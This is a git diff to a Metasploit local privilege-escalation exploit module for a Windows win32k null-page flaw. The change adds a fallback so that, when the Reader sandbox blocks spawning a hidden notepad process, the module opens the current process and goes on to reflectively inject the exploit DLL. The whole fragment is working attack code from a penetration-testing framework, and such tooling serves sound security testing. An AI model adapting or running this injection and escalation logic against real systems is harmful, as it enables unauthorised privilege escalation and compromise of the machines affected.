diff --git a/modules/exploits/windows/local/win32k_null_page.rb b/modules/exploits/windows/local/win32k_null_page.rb
index 276d38144c..3d074433a3 100644
--- a/modules/exploits/windows/local/win32k_null_page.rb
+++ b/modules/exploits/windows/local/win32k_null_page.rb
@@ -99,7 +99,13 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Launching notepad to host the exploit...")
     notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
-    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    begin
+      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      process = client.sys.process.open
+    end
     print_good("Process #{process.pid} launched.")
 
     print_status("Reflectively injecting the exploit DLL into #{process.pid}...")